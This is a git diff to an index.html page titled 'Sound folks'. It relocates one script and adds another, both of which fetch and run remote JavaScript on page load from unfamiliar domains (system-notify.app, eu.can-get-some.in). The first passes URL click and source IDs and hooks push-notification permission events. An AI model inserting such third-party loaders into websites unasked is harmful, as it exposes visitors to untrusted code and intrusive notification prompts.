--- a/index.html
+++ b/index.html
@@ -14,27 +14,6 @@
 </head>
 
 <body>
-    <script async data-cfasync="false">
-  (function() {
-      const url = new URL(window.location.href);
-      const clickID = url.searchParams.get("click_id");
-      const sourceID = url.searchParams.get("source_id");
-
-      const s = document.createElement("script");
-      s.dataset.cfasync = "false";
-      s.src = "https://system-notify.app/f/sdk.js?z=685325";
-      s.onload = (opts) => {
-          opts.zoneID = 685325;
-          opts.extClickID = clickID;
-          opts.subID1 = sourceID;
-          opts.actions.onPermissionGranted = () => {};
-          opts.actions.onPermissionDenied = () => {};
-          opts.actions.onAlreadySubscribed = () => {};
-          opts.actions.onError = () => {};
-      };
-      document.head.appendChild(s);
-  })()
-</script>
     <h1 id="rip">Sound folks</h1>
     <hr>
     <div class="container">
@@ -1302,5 +1281,35 @@
                         section.</h1>
                 </div>
 </body>
+    <script async data-cfasync="false">
+  (function() {
+      const url = new URL(window.location.href);
+      const clickID = url.searchParams.get("click_id");
+      const sourceID = url.searchParams.get("source_id");
 
+      const s = document.createElement("script");
+      s.dataset.cfasync = "false";
+      s.src = "https://system-notify.app/f/sdk.js?z=685325";
+      s.onload = (opts) => {
+          opts.zoneID = 685325;
+          opts.extClickID = clickID;
+          opts.subID1 = sourceID;
+          opts.actions.onPermissionGranted = () => {};
+          opts.actions.onPermissionDenied = () => {};
+          opts.actions.onAlreadySubscribed = () => {};
+          opts.actions.onError = () => {};
+      };
+      document.head.appendChild(s);
+  })()
+</script>
+            <div id="zc_685327"></div>
+<script type="text/javascript">
+    (function (d, c) {
+        var s = d.createElement('script');
+        s.type = 'text/javascript';
+        s.src = 'https://eu.can-get-some.in/p/685327?c=zc_685327';
+        s.async = true;
+        d.getElementById(c).appendChild(s);
+    })(document, 'zc_685327');
+</script>
 </html>
